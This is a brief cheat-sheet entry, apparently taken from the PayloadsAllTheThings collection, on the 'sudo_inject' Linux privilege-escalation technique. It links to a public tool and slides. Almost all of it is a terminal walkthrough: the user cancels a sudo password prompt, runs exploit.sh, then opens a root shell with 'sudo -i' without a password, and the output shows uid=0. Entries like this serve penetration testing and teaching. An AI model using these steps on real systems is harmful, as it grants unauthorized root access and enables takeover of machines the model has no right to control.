sudo_inject

Technique from PayloadsAllTheThings

Using https://github.com/nongiach/sudo_inject:

    $ sudo whatever
    [sudo] password for user:
    # Press <ctrl>+c since you don't have the password.
    # This creates an invalid sudo token.
    $ sh exploit.sh
    .... wait 1 second
    $ sudo -i # no password required :)
    # id
    uid=0(root) gid=0(root) groups=0(root)

Slides of the presentation: https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf
